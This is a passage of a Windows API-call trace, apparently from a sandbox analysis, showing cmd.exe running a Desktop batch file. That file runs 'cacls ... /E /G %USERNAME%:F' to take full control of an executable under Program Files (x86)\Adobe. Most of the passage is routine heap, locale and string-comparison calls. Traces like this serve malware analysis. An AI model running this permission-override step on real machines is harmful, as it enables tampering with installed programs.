hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ac0 | out: hHeap=0x4f0000) returned 1 [0239.017] GetConsoleOutputCP () returned 0x1b5 [0239.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0239.471] GetUserDefaultLCID () returned 0x409 [0239.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f6c0, cchData=128 | out: lpLCData="0") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f6c0, cchData=128 | out: lpLCData="0") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f6c0, cchData=128 | out: lpLCData="1") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0239.472] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0239.472] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0239.474] GetProcessHeap () returned 0x4f0000 [0239.474] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x502f08 [0239.474] GetConsoleTitleW (in: lpConsoleTitle=0x502f08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0239.475] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0239.475] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0239.475] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0239.476] GetProcessHeap () returned 0x4f0000 [0239.476] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506ac0 [0239.476] GetProcessHeap () returned 0x4f0000 [0239.476] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ac0 | out: hHeap=0x4f0000) returned 1 [0239.478] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0239.478] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0239.478] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0239.478] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0239.479] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0239.479] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0239.479] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0239.479] GetProcessHeap () returned 0x4f0000 [0239.479] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503120 [0239.479] GetProcessHeap () returned 0x4f0000 [0239.479] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x72) returned 0x512b10 [0239.480] GetProcessHeap () returned 0x4f0000 [0239.480] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x60) returned 0x503180 [0239.481] GetConsoleTitleW (in: lpConsoleTitle=0x32f3b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.482] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0239.482] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0239.482] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0239.482] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0239.482] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0239.482] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0239.482] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0239.482] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0239.482] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0239.482] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0239.483] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0239.483] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0239.483] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0239.483] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0239.483] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0239.483] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0239.483] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0239.483] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0239.483] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0239.483] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0239.483] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0239.483] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0239.483] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0239.483] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0239.483] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0239.483] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0239.483] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0239.483] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0239.483] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0239.483] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0239.483] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0239.483] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0239.483] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0239.483] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0239.483] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0239.483] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0239.483] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0239.484] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0239.484] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0239.484] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0239.484] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0239.484] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0239.484] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0239.484] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0239.484] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0239.484] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0239.484] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0239.484] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0239.484] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0239.484] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0239.484] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0239.484] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0239.484] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0239.484] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0239.484] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0239.484] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0239.484] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0239.484] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0239.484] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0239.484] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0239.484] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0239.484] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0239.484] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0239.485] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0239.485] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0239.485] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0239.485] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0239.485] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0239.485] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0239.485] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0239.485] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0239.485] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0239.485] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0239.485] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0239.485] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0239.485] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0239.485] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0239.485] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0239.485] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0239.485] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0239.485] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0239.485] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0239.485] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0239.485] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0239.485] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0239.485] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0239.485] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0239.485] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0239.485] GetProcessHeap () returned 0x4f0000 [0239.485] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x5031e8 [0239.485] GetProcessHeap () returned 0x4f0000 [0239.486] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xca) returned 0x503400 [0239.488] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0239.488] GetProcessHeap () returned 0x4f0000 [0239.488] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x4f07f0 [0239.488] SetErrorMode (uMode=0x0) returned 0x0 [0239.488] SetErrorMode (uMode=0x1) returned 0x0 [0239.488] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4f07f8, lpFilePart=0x32eed8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32eed8*="Desktop") returned 0x25 [0239.488] SetErrorMode (uMode=0x0) returned 0x1 [0239.488] GetProcessHeap () returned 0x4f0000 [0239.488] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f07f0, Size=0x6e) returned 0x4f07f0 [0239.488] GetProcessHeap () returned 0x4f0000 [0239.488] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f07f0) returned 0x6e [0239.488] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0239.488] GetProcessHeap () returned 0x4f0000 [0239.488] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5a) returned 0x5034d8 [0239.488] GetProcessHeap () returned 0x4f0000 [0239.488] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa8) returned 0x503540 [0239.489] GetProcessHeap () returned 0x4f0000 [0239.489] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x503540, Size=0x5a) returned 0x503540 [0239.489] GetProcessHeap () returned 0x4f0000 [0239.489] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x503540) returned 0x5a [0239.489] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.489] GetProcessHeap () returned 0x4f0000 [0239.489] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe0) returned 0x4f0868 [0239.495] GetProcessHeap () returned 0x4f0000 [0239.495] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f0868, Size=0x76) returned 0x4f0868 [0239.495] GetProcessHeap () returned 0x4f0000 [0239.495] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f0868) returned 0x76 [0239.495] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.495] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x32ec74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec74) returned 0x5035a8 [0239.495] GetProcessHeap () returned 0x4f0000 [0239.495] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x5017e0 [0239.495] FindClose (in: hFindFile=0x5035a8 | out: hFindFile=0x5035a8) returned 1 [0239.496] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0239.496] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0239.496] GetConsoleTitleW (in: lpConsoleTitle=0x32f14c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.496] GetProcessHeap () returned 0x4f0000 [0239.496] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x11c) returned 0x4f08e8 [0239.496] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0239.497] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0239.497] IdentifyCodeAuthzLevelW () returned 0x1 [0239.504] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0239.504] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0240.017] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0240.017] CloseCodeAuthzLevel () returned 0x1 [0240.017] SetErrorMode (uMode=0x0) returned 0x0 [0240.017] SetErrorMode (uMode=0x1) returned 0x0 [0240.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x5031f0, lpFilePart=0x32f038 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x32f038*="Ch81ANBE.bat") returned 0x32 [0240.017] SetErrorMode (uMode=0x0) returned 0x1 [0240.017] GetProcessHeap () returned 0x4f0000 [0240.017] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x72) returned 0x512b90 [0240.017] wcsspn (_String=" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"", _Control=" \x09") returned 0x1 [0240.017] GetProcessHeap () returned 0x4f0000 [0240.017] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5e) returned 0x4f10e8 [0240.017] GetProcessHeap () returned 0x4f0000 [0240.017] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb4) returned 0x4f1150 [0240.017] GetProcessHeap () returned 0x4f0000 [0240.017] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f1150, Size=0x60) returned 0x4f1150 [0240.017] GetProcessHeap () returned 0x4f0000 [0240.017] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f1150) returned 0x60 [0240.017] CmdBatNotification () returned 0x503252 [0240.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32f07c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0240.018] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0240.018] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.018] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.018] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.018] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.019] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x32f060, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x32f060*=0xe2, lpOverlapped=0x0) returned 1 [0240.020] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0240.020] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0240.022] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.022] GetFileType (hFile=0x78) returned 0x1 [0240.022] _get_osfhandle (_FileHandle=3) returned 0x78 [0240.022] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0240.022] GetProcessHeap () returned 0x4f0000 [0240.022] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506ac0 [0240.022] GetProcessHeap () returned 0x4f0000 [0240.022] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x514af8 [0240.023] GetProcessHeap () returned 0x4f0000 [0240.023] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x505810 [0240.023] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0240.023] GetProcessHeap () returned 0x4f0000 [0240.023] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505810 | out: hHeap=0x4f0000) returned 1 [0240.023] GetProcessHeap () returned 0x4f0000 [0240.023] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x514af8 | out: hHeap=0x4f0000) returned 1 [0240.023] GetProcessHeap () returned 0x4f0000 [0240.023] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ac0 | out: hHeap=0x4f0000) returned 1 [0240.024] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0240.024] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0240.024] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0240.024] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0240.024] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0240.024] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0240.024] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0240.024] GetProcessHeap () returned 0x4f0000 [0240.024] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x4f11b8 [0240.024] GetProcessHeap () returned 0x4f0000 [0240.024] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x4ff4b8 [0240.028] GetProcessHeap () returned 0x4f0000 [0240.028] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa0) returned 0x4f1218 [0240.029] _tell (_FileHandle=3) returned 32 [0240.029] _close (_FileHandle=3) returned 0 [0240.029] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ee34 | out: _Buffer="\r\n") returned 2 [0240.030] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.030] GetFileType (hFile=0x7) returned 0x2 [0240.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf4 | out: lpMode=0x32edf4) returned 1 [0240.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ee20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ee20*=0x2) returned 1 [0240.031] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0240.031] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0240.031] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ee30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0240.031] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ee30 | out: _Buffer=">") returned 1 [0240.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.031] GetFileType (hFile=0x7) returned 0x2 [0240.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.032] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf8 | out: lpMode=0x32edf8) returned 1 [0240.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.032] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ee24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ee24*=0x26) returned 1 [0240.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.033] GetFileType (hFile=0x7) returned 0x2 [0240.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.033] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f07c | out: lpMode=0x32f07c) returned 1 [0240.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.034] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ff4c0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x32f0a8, lpReserved=0x0 | out: lpBuffer=0x4ff4c0*, lpNumberOfCharsWritten=0x32f0a8*=0x5) returned 1 [0240.034] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f0b4 | out: _Buffer=" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 76 [0240.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.034] GetFileType (hFile=0x7) returned 0x2 [0240.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0240.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x4c) returned 1 [0240.035] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32f0d4 | out: _Buffer="\r\n") returned 2 [0240.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.035] GetFileType (hFile=0x7) returned 0x2 [0240.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f094 | out: lpMode=0x32f094) returned 1 [0240.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.036] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0c0*=0x2) returned 1 [0240.036] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0240.036] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0240.036] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0240.036] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0240.036] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0240.036] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0240.036] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0240.036] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0240.036] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0240.036] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0240.036] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0240.037] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0240.037] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0240.037] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0240.037] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0240.037] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0240.037] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0240.037] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0240.037] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0240.037] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0240.037] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0240.037] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0240.037] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0240.037] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0240.037] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0240.037] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0240.037] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0240.037] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0240.037] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0240.037] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0240.037] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0240.037] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0240.037] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0240.037] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0240.037] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0240.037] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0240.037] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0240.037] 